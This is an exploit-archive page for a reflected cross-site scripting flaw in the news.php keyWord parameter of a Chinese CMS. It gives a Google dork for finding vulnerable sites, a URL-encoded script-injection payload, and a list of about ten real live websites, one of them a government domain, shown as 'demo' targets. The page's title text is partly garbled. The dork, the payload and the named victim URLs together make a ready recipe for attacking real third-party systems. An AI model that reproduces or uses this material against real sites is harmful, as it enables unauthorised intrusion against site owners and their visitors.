Home / exploits CMS Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>江è‹ç½‘路神在线 CMS Cross Site Scripting </TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : 江è‹ç½‘路神在线 CMS Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.eweb.cn/ # Google Dork : intext:" 设计维护:江è‹ç½‘路神在线 " # Date: 23 May 2016 # Tested On : Kali # Contact:<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="a8c69bdc86c0c9cbc3cddae8cfc5c9c1c486cbc7c5">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> ##########M############ # Vulnerable File : news.php # Request Method: GET # Describe : Search dork and select Target. Put /news.php After url such as : # http://site.com/news.php # Now Add : # ?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # : http://site.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # OK :) # # # Demo : # http://www.csnl.gov.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://csasia.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://gemmusical.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://www.ayjk.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://www.yebusi.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://www.csbjct.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://www.tianxiatex.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://jsxhfz.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://changgong-cs.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # http://www.bxzs.com.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E # # # # # ###################### # discovered by : Net Hacker ######################</BODY></HTML>